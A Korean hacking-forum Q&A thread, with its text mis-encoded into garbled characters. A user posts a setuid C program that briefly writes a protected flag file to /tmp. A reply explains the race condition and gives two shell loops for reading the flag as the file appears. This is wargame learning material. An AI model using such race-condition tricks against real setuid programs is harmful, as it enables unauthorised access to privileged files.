¸®´ª½º

 3923, 1/197 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ewqqw
   setuid¸¦ ÀÌ¿ëÇÑ ±ÇÇÑ »ó½Â

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_linux&no=4453 [º¹»ç]


./rc ¸¦ ½ÇÇà½ÃÅ°¸é¼­ ÀÌ ÇÁ·Î±×·¥ÀÇ fget ÇÔ¼ö¸¦ ¹ßµ¿½Ãų ¼ö ÀÖ´Â ¹æ¹ýÀÌ ¾ø³ª¿ä?

./rc ¸¸ ½ÇÇà½ÃÅ°¸é ±×³É /tmp/RC¸¸ »ç¶óÁö°í ³¡³³´Ï´Ù¸¸...

#include <stdio.h>
#include <stdlib.h>

int main() {
        FILE *fp,*fo;
        char key[40];
        
        
        system("rm /tmp/RC");

        fo=fopen("/home/rc/flag","r");
        fp=fopen("/tmp/RC","w");
        
        if(!fo)
                printf("failed to open flag ask to admin\n");
        if(!fp)
                printf("failed to open RC file ask to admin\n");

        fgets(key,40,fo);
        fprintf(fp,"%s\n",key);

        fclose(fp);
        fclose(fo);
        
        system("rm /tmp/RC");

        return 0;
}
  Hit : 2347     Date : 2017/03/29 02:14


    
ÇØÄð·¯ fgetsÀÇ ¼¼¹ø°ÀÎÀÚ°¡ fpÀε¥ fp¿¡ stdinÀÌ ¾Æ´Ï¶ó fopen("flag")°¡ µé¾î°¬ÁÒ
Ç÷¡±×ÆÄÀÏÀ» ¸¸µé°í Å°¸¦ ¾²°í Áö¿ì±â¸¦ ¹Ýº¹Çϴ°̴ϴÙ
Ç÷¡±×°¡ /home/rc/flag¿¡ ¿øº»ÀÌ ÀÖ°í ÀÌ°É °è¼Ó /tmp/RC¿¡ ¾²°í »èÁ¦ÇÏ°í ¾²°í »èÁ¦ÇÏ°í Çϴ°ÅÁÒ
ÀüÇüÀûÀÎ ·¹À̽ºÄÁµð¼Ç ¹®Á¦Àε¥
while [ 1 ] ; do ./rc; done À» ÇسõÀ¸½Ã°í
Çϳª¿¡¼­´Â
while [ 1 ] ; do cat /tmp/RC; done À» ÇسõÀ¸½Ã¸é µÎ¹ø° Å͹̳ο¡¼­ Ç÷¡±×°¡ ³ª¿É´Ï´Ù		 2017/03/29  
ewqqw µÎ ¸í·É¹®ÀÇ Â÷À̸¦ ÆÄ°íµé¾î¼­ setuid¸¦ ¾ò´Â °ÍÀ̱º¿ä.... °¨»çÇÕ´Ï´Ù 2017/03/29  
3923   ¸®´ª½º°¡ ¼³Ä¡µÈ ÆÄÀÏÀ» ±âÁ¸ ³»Àåssd¿¡¼­ ¿ÜÀåssd·Î ¿Å±â±â      wnddkdch2004
 01/16 1447
3922   VM ȯ°æ¿¡¼­ GPU »ç¿ë¹ý¿¡ ´ëÇÑ Áú¹®[1]     wuzu22
 07/19 1451
3921   ¸®´ª½º °øºÎ ¹æ¹ý, ±³Àç ÃßõÇØ ÁÖ¼¼¿ä.[1]     Haike0548
 05/24 1654
3920   vmware Ä®¸®¸®´ª½º Áú¹®ÀÖ¾î¿ä![2]     EgoistYI
 04/05 1746
3919   ftz trainer1 ¾ÏÈ£¿ä¤Ð[1]     keeyeon
 04/02 1587
3918   FTZÁ¢¼Ó¹æ¹ý[2]     tkd115
 01/13 2317
3917   ¸®´ª½º john the ripper´ëÇÑ Áú¹® Á» ÇÒ°Ô¿ä     cd1641
 11/20 1590
3916   ftz ȯ°æ±¸Ãà ÇÏ·Á°í Çϴµ¥ °è¼Ó ¿À·ù°¡ ¹ß»ýÇÕ´Ï´Ù. [2]     poh1207
 07/10 1605
3915     [re] ftz ȯ°æ±¸Ãà ÇÏ·Á°í Çϴµ¥ °è¼Ó ¿À·ù°¡ ¹ß»ýÇÕ´Ï´Ù.      kimwoojin0952
 08/02 1379
3914   x11vnc ¼³Ä¡ÈÄ, À©µµ¿ì ¾ÈµÊ. ubuntu18.04.2 LTS     localid
 04/23 2125
3913   ÆÄÀÏ µð½ºÅ©¸³ÅÍ[1]     turttle2s
 02/10 1585
3912   DVWA»ç¿ëÈÄ ÆÄÀ̾îÆø½º°¡¾ÈµË´Ï´Ù[1]     wlzh1313
 02/07 2010
3911   ¸®´ª½º ºÎÆÃUSB Áú¹®     iioks
 12/29 1705
3910   dionaea honeypot Çغ¸½ÅºÐ °è½Å°¡¿ä?     teletubbies
 07/05 2349
3909   ¸®´ª½º¿¡¼­ pupy¼³Ä¡ÇÒ¶§..     redfrog
 05/07 2941
3908   bootable USB ¸¸µé¶§     krimson701
 03/27 2271
3907   FTZ ·ÎÄÃȯ°æ ±¸ÃàÁú¹®[1]     krimson701
 03/19 2851
3906   ÇÏµå ¸µÅ©¿Í ½Éº¼¸¯ ¸µÅ©     ka0r1
 12/07 2150
3905   ¸®´ª½º [1]     jeffrey4127
 11/26 1881
3904   ¸®´ª½º vmware ¼³Ä¡[2]     jeffrey4127
 10/31 2745
1 [2][3][4][5][6][7][8][9][10]..[197]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org